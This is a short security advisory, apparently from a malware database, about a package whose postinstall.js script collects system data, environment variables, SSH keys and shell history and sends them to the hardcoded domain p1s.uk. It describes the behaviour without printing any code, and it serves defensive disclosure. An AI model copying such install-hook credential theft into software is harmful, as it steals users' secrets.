The package is marked as malware by OSV: MAL-2026-2615 with source: ghsa-malware

Note: This report is updated by a verification record

The package contains a postinstall.js script that exhibits multiple malicious behaviors. It collects user, system, disk, and network information (Evidence 0), gathers and exfiltrates system information to a hardcoded domain p1s.uk (Evidence 1, 10), collects sensitive environment variables (Evidence 11), reads sensitive files such as SSH keys and shell history (Evidence 12, 4, 5, 6, 7, 8), and executes potentially dangerous commands (Evidence 13). The script also falls back to HTTP if HTTPS fails (Evidence 14). These behaviors, combined with YARA rule matches for system information exfiltration, SSH key access, and command execution, strongly suggest that the package is malicious.